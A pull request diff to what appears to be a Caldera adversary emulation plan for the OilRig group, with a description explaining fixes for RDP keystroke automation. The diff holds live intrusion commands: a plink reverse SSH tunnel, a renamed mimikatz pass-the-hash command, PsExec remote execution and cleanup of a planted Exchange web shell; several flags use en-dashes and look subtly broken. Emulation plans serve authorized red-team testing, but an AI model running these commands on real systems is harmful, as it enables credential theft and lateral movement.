### PR TITLE
Several fixes and improvements on oilrig.yaml

### DIFF
--- a/ManagedServices/oilrig/Emulation_Plan/yaml/oilrig.yaml
+++ b/ManagedServices/oilrig/Emulation_Plan/yaml/oilrig.yaml
@@ -563,7 +563,7 @@
     windows:
       proc:
         command: |
-          exec-background C:\Users\Public\Downloads\plink.exe -no-antispoof -ssh -N -R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} -pw "#{caldera.user.password}" #{caldera.server.ip}
+          exec-background C:\Windows\System32\cmd.exe /c echo yes | C:\Users\Public\Downloads\plink.exe -no-antispoof -ssh -N -R #{caldera.server.ip}:13389:#{second.target.ip}:3389 -l #{caldera.user.name} -pw "#{caldera.user.password}" #{caldera.server.ip}
         timeout: 120
   input_arguments:
     caldera.server.ip:
@@ -593,7 +593,7 @@
     linux:
       proc:
         command: |
-          exec-background xfreerdp /u:'#{network.domain.name}\#{initial.target.user}' /p:'#{initial.target.password}' /v:localhost:13389 /cert-ignore
+          exec-background xfreerdp /u:'#{network.domain.name}\#{initial.target.user}' /p:'#{initial.target.password}' /v:localhost:13389 /cert:ignore
 
 
 # Step 8
@@ -667,23 +667,39 @@
         command: |
           sleep 5;
           rdp_pid=$(pgrep -f "xfreerdp.*/v:localhost");
-          rdp_window=$(xdotool search --pid "$rdp_pid");
-          xdotool key --window "$rdp_window" Super_L;
-          sleep 5; 
-          xdotool windowactivate --sync "$rdp_window" type --delay 200 "cmd";
-          sleep 3; 
-          xdotool key --window "$rdp_window" Ctrl+Shift+Return;
-          sleep 3; 
-          xdotool key --window "$rdp_window" Tab Tab;
+          rdp_window=$(xdotool search --pid "$rdp_pid" | head -n 1);
+          sleep 5;
+          rdp_pid=$(pgrep -f "xfreerdp.*/v:localhost");
+          rdp_window=$(xdotool search --pid "$rdp_pid" –onlyvisible | head -n 1);
+          xdotool windowactivate --sync "$rdp_window";
+          eval $(xdotool getwindowgeometry --shell "$rdp_window");
+          xdotool mousemove $((X + WIDTH / 2)) $((Y + HEIGHT / 2)) click 1;
+          sleep 1;
+          xdotool key –clearmodifiers --window "$rdp_window" Ctrl+Shift+Escape; 
+          sleep 1;
+          xdotool key –clearmodifiers --window "$rdp_window" Shift+Tab+space; 
+          sleep 1;
+          xdotool key --window "$rdp_window" Alt;
+          sleep 1;
           xdotool key --window "$rdp_window" Return;
-          sleep 3; 
+          sleep 1;
+          xdotool key --window "$rdp_window" Return;
+          sleep 1;
+          xdotool type --window "$rdp_window" 'cmd.exe';
+          sleep 5; 
+          xdotool key --window "$rdp_window" Return;
+          sleep 5;
+          xdotool key --clearmodifiers --window "$rdp_window" Ctrl+Shift+Escape;
+          sleep 1;
+          xdotool key –clearmodifiers --window "$rdp_window" Alt+F4;
+          sleep 5;
           xdotool type --window "$rdp_window" 'C:\Windows\System32\mom64.exe "privilege::debug" "sekurlsa::pth /user:#{second.target.user} /domain:#{network.domain.name} /ntlm:#{second.target.ntlm}"';
           xdotool key --window "$rdp_window" Return;
           sleep 3; 
           xdotool type --window "$rdp_window" 'copy C:\Windows\Temp\Nt.dat \\#{third.target.ip}\C$\ProgramData\';
           xdotool key --window "$rdp_window" Return;
           sleep 3; 
-          xdotool type --window "$rdp_window" 'C:\Windows\System32\ps.exe \\#{third.target.ip} cmd.exe';
+          xdotool type --window "$rdp_window" 'C:\Windows\System32\ps.exe  /accepteula \\#{third.target.ip} cmd.exe';
           xdotool key --window "$rdp_window" Return;
           sleep 5;
         timeout: 150
@@ -812,6 +828,12 @@
           xdotool key --window "$rdp_window" Return;
           sleep 2;
           xdotool type --window "$rdp_window" 'del C:\Windows\System32\mom64.exe C:\Windows\temp\Nt.dat C:\Windows\System32\ps.exe';
+          xdotool key --window "$rdp_window" Return;
+          sleep 2;   
+          xdotool type --window "$rdp_window" 'attrib -h "C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\contact.aspx"';
+          xdotool key --window "$rdp_window" Return;
+          sleep 2;   
+          xdotool type --window "$rdp_window" 'del "C:\Program Files\Microsoft\Exchange Server\V15\ClientAccess\exchweb\ews\contact.aspx"';
           xdotool key --window "$rdp_window" Return;
           sleep 2;   
           xdotool type --window "$rdp_window" 'exit';


### PR DESCRIPTION
After several tests, the main issue with the current code is that most of the time xdotool loses focus on the xfreerdp windows or the Linux host, where Caldera runs, grabs the keys sent to xfreerdp window like the Super_L or Ctrl+Shift+Escape keys.

This proposal has several advantages:

- The main one:  It´s better to use the Task Manager to run a cmd.exe. In case your Windows Server is running without GUI you can still RDP but Super_L key has no effect. This approach of running the Task Manager can work on both versions, with or without GUI. 
- The xdotool search command has been improved trying to avoid other xfreerdp windows opened by using head -n 1 filter.
- Make sure you don´t lose focus on the window before you send the hot keys by setting the mouse right in the middle of the windows before sending any key. 

The final Alt+F4 combination closes the Task Manager after spawning the cmd.exe window.


There are more changes:

- ps.exe first time needs to accepteula, so I added the option to the command /accepteula

- plink needs to accept the key the first time is run or run cmd.exe /c echo yes | plink ...

- contact.aspx needs to be cleaned up from waterfalls in the cleanup via RDP